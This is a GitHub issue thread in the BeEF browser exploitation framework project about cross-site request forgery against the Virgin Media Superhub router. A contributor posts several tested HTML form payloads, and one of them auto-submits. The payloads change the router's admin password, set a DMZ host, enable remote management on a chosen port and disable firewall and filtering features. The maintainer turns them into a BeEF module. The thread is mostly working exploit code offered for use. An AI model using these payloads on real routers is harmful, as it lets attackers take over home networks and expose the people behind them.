search

beefproject / beef

The Browser Exploitation Framework Project
https://beefproject.com
9.74k stars 2.16k forks source link

CSRF Virgin Superhub (UK) #703

Closed n0x00 closed 12 years ago

n0x00 commented 12 years ago

I had tested this at home, it works.

it will only work when the Admin is logged in but if you could redirect web pages to the router perhaps he'll log in just to see WTF. ..can't seem to post HTML in here pre isn't working ?! anyone help ? I'll post the code

<body>
<html>
<form action=”http://192.168.100.1/goform/RgSecurity” method=”POST”>
<input type=”hidden” name=”NetgearPassword” value=”p3nt35t” />
<input type=”hidden” name=”NetgearPasswordReEnter” value=”p3nt35t” />
<input type=”hidden” name=”RestoreFactoryNo” value=”0×00″ />
<input type=”submit” value=”Submit form” />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>```
bcoles commented 12 years ago

Thanks for this.

I've added a module for this in commit 771d6d60f9cb077c62e6d163e3ac7e1a8c89576f. Are you able to confirm it works?

You can use 3x backticks (```) to start and end code sections.

Like this

n0x00 commented 12 years ago

Sweet, I am Sure, but just because you asked and it's been about 6 weeks since I played with it, I'll double-check tonight :)

I'm not sure how I would incorporate it to beef, I'm new to Git and imagine there are people more fluent at coding than me

three backticks! got it :)

bcoles commented 12 years ago

It's already incorporated into BeEF :)

I'm closing this issue. Please let me know if the BeEF module works.

n0x00 commented 12 years ago

hah wicked! here i was making a screeny for you, I'll test it now !

PoC - http://thegentlemanhackersclub.com/verdhehoes_cha_cha_cha/SuperHubCSRF/SuperHub-CSRF.html

n0x00 commented 12 years ago

Hey, it doesn't want to work with that module mate ...I had tried it a few times and then ran the html created to replicate it. i'll paste in here - this one has a submit value that the other doesn't perhaps that's my fault but below this code works 100% everytime as of this morning (recreating the attack)


<html>
  <body>
    <form action="http://192.168.100.1/goform/RgSecurity" method="POST">
      <input type="hidden" name="NetgearPassword" value="sneaky" />
      <input type="hidden" name="NetgearPasswordReEnter" value="sneaky" />
      <input type="hidden" name="RestoreFactoryNo" value="0x00" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>
bcoles commented 12 years ago

Thanks for testing.

Were you logged in to the router?

The submit tag shouldn't make a difference.

The default IP address for the module is http://192.168.1.254/ - which is probably the problem. This has now been fixed. Did you change it to http://192.168.100.1/ when you were testing?

The request used by the BeEF module is exactly the same as the request used in your video, with one exception: it contains two "/" characters, which might also be the issue, ie. http://192.168.100.1//goform/RgSecurity

Try submitting the IP address without the trailing slash, ie: http://192.168.100.1

n0x00 commented 12 years ago

I did change the address yes, Im sure I was logged in ( I didn't have it going through burp but will do until we get this)

I also tried to append the RGSecurity to RgSecurity.asp to see if that worked but i'll have a tinker

I just locked my self out of it hah :/, I'll keep you posted,

Cool.

n0x00 commented 12 years ago

I removed the training slash and it works :)

n0x00 commented 12 years ago

Another note, this whole device is vulnerable to CSRF, i just figured this would be the most used / wanted feature. cool!

bcoles commented 12 years ago

Sweet. Thanks for testing.

I've fixed the issue with the duplicate slash /

For BeEF router CSRF modules we generally stick to payloads which:

n0x00 commented 12 years ago

I'll have a crack at them tonight!

n0x00 commented 12 years ago

To DMZ a host you see the value '3' is the last octet of the class C (IP)

<html>
  <body>
    <form action="http://192.168.100.1/goform/RgDmzHost" method="POST">
      <input type="hidden" name="cbNetgearWanBlocking" value="0x10" />
      <input type="hidden" name="DmzHostIP3" value="3" />
      <input type="hidden" name="NetgearMtuSize" value="0" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>

-Tested :)

n0x00 commented 12 years ago

Enable Remote Managment - port 8080 - change the value 8080 for your own port

<html>
  <body>
    <form action="http://192.168.100.1/goform/RgVMRemoteManagementRes" method="POST">
      <input type="hidden" name="NetgearVMRmEnable" value="0x01" />
      <input type="hidden" name="NetgearVMRmPortNumber" value="8080" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>
n0x00 commented 12 years ago

Disable all Firewalls and Filtering services

Firewall Features
Ipsec PassThrough
PPTP PassThrough
Multicast Port Scan Detection
IP Flood Detection

Web Features Filter Proxy
Filter Cookies
Filter Java Applet Filter ActiveX
Filter Popup Windows Block Fragmented IP Packets

sweet.

<html>
  <body>
    <form action="http://192.168.100.1/goform/RgServices" method="POST">
      <input type="hidden" name="cbPortScanDetection" value="" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>

-Tested :)